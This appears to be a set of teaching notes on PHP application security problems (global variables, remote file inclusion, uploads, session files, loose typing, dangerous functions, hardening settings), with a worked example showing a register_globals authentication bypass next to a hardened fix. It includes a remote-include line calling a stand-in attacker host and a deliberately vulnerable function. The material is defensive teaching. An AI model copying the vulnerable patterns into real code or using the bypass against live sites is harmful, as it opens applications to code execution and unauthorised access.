Security problems in PHP applications
-------------------------------------

Based on http://www.securereality.com.au/studyinscarlet.txt

- Global Variables

    // $authenticated is never initialised; with register_globals=On a
    // request parameter of the same name sets it before this code runs.
    if ($password == "secret")
        $authenticated = 1;
    if ($authenticated) {
        // Do secret stuff
    }

- Remote Files

    require("")...
    include("http://www.evil.com/blah.php");

- File Upload (old style)

    $up      = Filename on local machine ("/tmp/phpxXuoXG")
    $up_size = Size in bytes of file (e.g. 1024)
    $up_name = The original name of the file on the remote system (e.g. "/home/gf/blah.txt")
    $up_type = MIME type of uploaded file (e.g. "text/plain")

- Library Files
  - In file1.php
  - In loadlanguage.php

- Session Files
  - Files owned by server uid
  - Stored in /tmp

- Loose Typing and Associative Arrays
  - Differences between $data[0] and $data["000"]

- Target Functions
  - require, include
  - eval
  - exec, passthru, ``, system, popen
  - fopen, readfile, file

- Protecting PHP
  - safe_mode
  - open_basedir
  - register_globals
  - allow_url_fopen
  - disable_functions
  - file_uploads
  - magic_quotes_gpc
  - display_errors
  - log_errors
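The Global Variables problem worked through as an added example (not code from the original slides or from the Study in Scarlet paper): the vulnerable check beside a hardened one. `extract()` stands in for register_globals=On so the script runs on a modern PHP CLI, and the `$request` arrays are constructed stand-ins for query-string parameters.

```php
<?php
// Vulnerable form, mirroring the slide. With register_globals=On every request
// parameter becomes a PHP variable, so an uninitialised $authenticated already
// holds whatever the client sent, and a failed password check never resets it.
function vulnerable(array $request): bool
{
    extract($request);                 // assumption: simulates register_globals=On
    if (isset($password) && $password == "secret")
        $authenticated = 1;
    return !empty($authenticated);     // true even when no password was sent
}

// Hardened form: initialise every state variable, read input only from an
// explicit source, and compare strictly (=== avoids the loose-typing surprises
// the "Loose Typing" slide refers to).
function hardened(array $request): bool
{
    $authenticated = false;
    $password = isset($request['password']) ? (string) $request['password'] : '';
    if ($password === "secret")
        $authenticated = true;
    return $authenticated;
}

// Constructed request: ?authenticated=1 with no password at all.
$forged = ['authenticated' => '1'];
var_dump(vulnerable($forged));                    // bool(true)  - check bypassed
var_dump(hardened($forged));                      // bool(false)
var_dump(hardened(['password' => 'secret']));     // bool(true)  - only the real secret works
```

The same fix applies in php.ini: set register_globals=Off (listed under "Protecting PHP") so the simulated `extract()` step never happens in the first place.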